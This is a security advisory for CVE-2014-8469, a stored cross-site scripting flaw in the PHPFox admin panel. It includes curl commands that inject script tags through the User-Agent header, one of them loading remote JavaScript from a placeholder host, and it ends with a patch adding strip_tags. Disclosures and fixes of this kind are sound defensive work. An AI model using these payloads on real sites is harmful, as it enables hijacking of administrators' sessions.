PHPFox XSS AdminCP

2014.11.21
Credit: Wesley Henrique Leite
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2014-8469
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: PHPFox XSS AdminCP # Date: 2014-10-22 # Exploit Author: Wesley Henrique Leite aka "spyk2r" # Vendor Homepage: http://www.moxi9.com # Version: All version # CVE : CVE-2014-8469 # Response Vendor: fixed 2014-10-23 (to v4 Beta) [+] DESCRIPTION The system stores all urls accessed in a database table, below information in the same 'phpfox_log_session' [phpfox]> desc phpfox_log_session; +---------------+----------------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +---------------+----------------------+------+-----+---------+-------+ ++++++++++ more values and | user_agent | varchar(100) | NO | | NULL | | +---------------+----------------------+------+-----+---------+-------+ the column that can be manipulated is: -> user_agent (100) all acess store in the system, such as bots and users wandering around the web site, can be seen in: AdminCP TOOLS > Online > Guests/Boots Output | IP ADDRESS | User-Agent | ... knowing this, the following code was created to inject a script into the AdminCP with User-Agent. $ curl -A "<script src='http://www.example.com/script.js'></script>" \ http://www.meusite.com.br/ OR $ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/ when any user with administrative access in. 'AdminCP' TOOLS > Online > Guests/Boots we have the script running in the administrative area. [+] My Solution (line 1.8) 1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200 1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200 1.3 @@ -25,7 +25,7 @@ 1.4 {foreach from=$aGuests key=iKey item=aGuest} 1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}"> 1.6 <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td> 1.7 - <td>{$aGuest.user_agent}</td> 1.8 + <td>{$aGuest.user_agent|strip_tags}</td> 1.9 <td class="t_center"> 1.10 <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}> 1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a> 1.12 @@ -43,4 +43,4 @@ 1.13 <div class="extra_info"> 1.14 {phrase var='admincp.no_guests_online'} 1.15 </div> 1.16 -{/if} 1.17 \ No newline at end of file 1.18 +{/if}

References:

http://packetstormsecurity.com/files/129153/PHPFox-Cross-Site-Scripting.html
http://www.securityfocus.com/bid/71180
http://www.exploit-db.com/exploits/35274
http://seclists.org/fulldisclosure/2014/Nov/50
http://xforce.iss.net/xforce/xfdb/98727


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top